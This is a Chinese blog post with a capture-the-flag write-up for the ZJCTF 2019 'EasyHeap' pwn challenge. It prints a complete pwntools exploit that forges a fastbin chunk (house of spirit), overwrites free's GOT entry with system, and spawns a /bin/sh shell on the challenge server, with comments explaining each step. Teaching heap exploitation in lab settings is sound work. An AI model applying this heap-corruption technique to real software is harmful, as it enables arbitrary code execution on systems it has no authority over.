[ZJCTF 2019]EasyHeap-house of spirit

最新推荐文章于 2024-01-12 22:00:27 发布
最新推荐文章于 2024-01-12 22:00:27 发布
阅读量235 收藏 4
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/114841145
版权
CTF 同时被 2 个专栏收录
43 篇文章 0 订阅
订阅专栏
HEAP
17 篇文章 0 订阅
订阅专栏

[ZJCTF 2019]EasyHeap-house of spirit

  • 先给出exp,exp中我标明了每一个步骤
  • 每个步骤执行完后,内存中的地址空间我也贴出来了

exp

from pwn import *
p = remote('node3.buuoj.cn',29012)
#p = process('./easyheap')
context.log_level = 'debug'
def creat(size,content):
	p.sendlineafter('Your choice :',str(1))
	p.sendlineafter('Size of Heap : ',str(size))
	p.sendafter('Content of heap:',content)

def edit(index,size,content):
	p.sendlineafter('Your choice :',str(2))
	p.sendlineafter('Index :',str(index))
	p.sendlineafter('Size of Heap : ',str(size))
	p.sendafter('Content of heap : ',content)

def delete(index):
	p.sendlineafter('Your choice :',str(3))
	p.sendlineafter('Index :',str(index))
#step1 创建3个chunk
creat(0x60,'a'*0x58) #0
creat(0x60,'b'*0x60) #1
creat(0x60,'c'*0x60) #2
#step2 释放chunk2
delete(2)

#step3 修改chunk1 中的内容为 /bin/sh 同时将chunk2 释放出来fast bin 的 fd 指针指向fake chunk
payload = b'/bin/sh\x00' +b'\x00'*0x60 + p64(0x71) + p64(0x6020ad) 
edit(1,len(payload),payload)

#step4 连续申请两次,得到的chunk2 就是我们在heaparray 附近的fake chunk
creat(0x60,'a')
creat(0x60,'aaa')

#step5 通过编辑chunk0,修改free_got 为 system_plt 
elf = ELF('./easyheap')
payload = b'a'*3 + p64(0)*4 + p64(elf.got['free'])
edit(3,len(payload),payload)
edit(0,8,p64(elf.plt['system']))

#step6 释放chunk1,会执行free(chunk1中的内容),即system('/bin/sh')
delete(1)
p.interactive()

step1 创建3个chunk

在这里插入图片描述

step2 释放chunk2

在这里插入图片描述

step3 修改chunk1 中的内容为 /bin/sh 同时将chunk2 释放出来fast bin 的 fd 指针指向fake chunk

在这里插入图片描述

step4 连续申请两次,得到的chunk2 就是我们在heaparray 附近的fake chunk

在这里插入图片描述

step5 通过编辑chunk0,修改free_got 为 system_plt

在这里插入图片描述

在这里插入图片描述

step6 释放chunk1,会执行free(chunk1中的内容),即system(’/bin/sh’)

huzai9527
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
萌新详解[ZJCTF 2019]EasyHeap,带你走进pwn世界
qq_36495104的博客
05-21 1937
安全保护 IDA查看 main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+0h] [rbp-10h] unsigned __int64 v5; // [rsp+8h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); se
pwn入门堆题[ZJCTF 2019]EasyHeap
最新发布
m0_73575406的博客
01-25 578
buuctf上一道简单的堆题wp,希望对新手有帮助(虽然我也只是刚学不久的新手啦QAQ),非常简单的利用方式,比uaf还简单(看wp前建议去wiki了解一下unsortedbin的相关知识)。
[BUUCTF]-PWN:[ZJCTF 2019]EasyHeap解析
2301_79326813的博客
01-12 579
这是buu上的一道堆题,话不多说直接看保护和ida这里有一个要注意的点,那就是它是partial RELRO,Full RELRO开启说明got表不可写,而这里没有,这是我们解题的一个前提。然后看ida。这里不过多解释,主要还是创建堆块,释放堆块,edit堆块,但是没有打印堆块内容的函数。还有一个要注意的点,那就是他有system函数,并且参数似乎可以利用。虽然在我解题的过程中这个函数压根得不到flag,但我还是想从这一角度讲解一下解题思路,所以我分两个角度来讲。
BUUCTF pwn——[ZJCTF 2019]EasyHeap
CNS-Enterprise BCC-1701-J
05-30 261
BUUCTF 做题练习
ZJCTF_2019_EasyHeap做题记录
weixin_52111404的博客
03-17 699
本文仅用作自己参考
open-house-of-commons
04-04
下议院开放我们的目标是使加拿大政治更容易获得和吸引广大公众。... 使人们了解信息的挑战在于,信息会丢失在政治术语和冗长而单调的文本屏幕中。 为了解决此问题,下议院开放日(OHoC)以快速,直观和视觉上吸引人的...
open-house-of-commons-api
03-22
【标题】"open-house-of-commons-api"是一个与英国下议院(House of Commons)相关的API项目,旨在提供一个开放接口来访问与议会活动、议员信息等相关的数据。这个API可能包含议会会议记录、议员投票行为、提案提交...
run-house-light.zip_house
09-23
标题中的"run-house-light.zip_house"暗示我们这是一个与编程相关的项目,可能是一个应用程序或代码库,用于实现一种视觉效果,即“跑马灯”。描述提到是用C#语言编写,并且涉及到了`timer`控件,这表明程序利用...
house-of-leaves
07-04
这个扩展程序以"house-of-leaves"为名,其功能是将网页上出现的所有"house"一词标记为蓝色,以此向这部作品致敬。 在技术层面上,这个扩展程序是用JavaScript编写的。JavaScript是一种广泛应用于Web开发的编程语言...
The State of AI 2019 - Divergence.pdf
07-02
UK is the powerhouse of European AI, hubs in Germany and France are thriving and may extend their influence in the decade ahead. As new AI hardware and software make the impossible inevitable, we also...
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
weixin_45441024的博客
12-27 628
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门 一般的堆题都是这种表单形式的
(off by one+uaf+house of spirit)Asis CTF 2016 b00ks+hacknote+ZJctfeasyheap
weixin_61283545的博客
06-19 156
这道题的溢出点在这里,break的判断的条件是=,从0开始如果循环次数没有减一那就会溢出,明显在输入作者名是会溢出经过程序的执行很清楚的可以看出,作者名和图书的连在一起就会是图书的第一位溢出。可以看到在图书指针的地位由于溢出多了变0了,于是我们便去寻找0x0000555555757700可以指向谁(我们这里是直接假设name为128,des为32),可以看到第一本书的des就正好为我们改变指针的位置,意味着可以修改第一本书 的des为任意内容,下面的步骤就是扩展mmap后写入第二本书的name和des,在伪
【pwn | 堆知识】关于unlink的体会 [ZJCTF EasyHeap]
ethan18的博客
08-15 269
当进行unlink的时候,正如同它的名字,它是会被从这个链表中取出来的(unlink也就是取消自己的link状态了)主要的思路就是通过创建3个chunk,将第一个chunk通过edit函数来修改chunk内容和下一个chunk的头部,变成一个伪造的空闲chunk,然后free第2个chunk,这会导致第一个chunk被unlink。在我看来,unlink的原理是,当你free了一个chunk的时候,如果你的物理相邻的chunk如果是空闲状态,那么这个空闲的chunk就会被合并,形成一个更大的chunk。
[ZJCTF 2019]EasyHeap
m0sway的博客
12-15 1352
[ZJCTF 2019]EasyHeap 使用checksec查看: 一道堆题,关闭了PIE,可以考虑覆盖got表来获取system getshell 拉进IDA中查看: 标准的菜单,main()函数就不贴截图了,menu()函数也没有营养,图也不贴了, 先来看看create_heap(): heaparray[i]:存放 chunk 的地址。 read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。 heaparray是存放在bss段上的 edit
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2699
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 469
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
Y_peak的博客
11-16 889
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap 思路 我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果, 但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用uaf就可以达到其目的。 exploit from pwn import * context(os='linux',arch='amd64',log_level='debug') p = remot
堆漏洞深入解析:House of SpiritHouse of Lore
"这篇文档是关于堆漏洞分析的‘house系列’第一部分,主要讨论了House of SpiritHouse of Lore两种技术。文章基于CentOS 6.10 32位系统,内核版本2.6.32,gcc 4.4.7,gdb 7.2和libc 2.12。作者提到了先前关于glibc...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值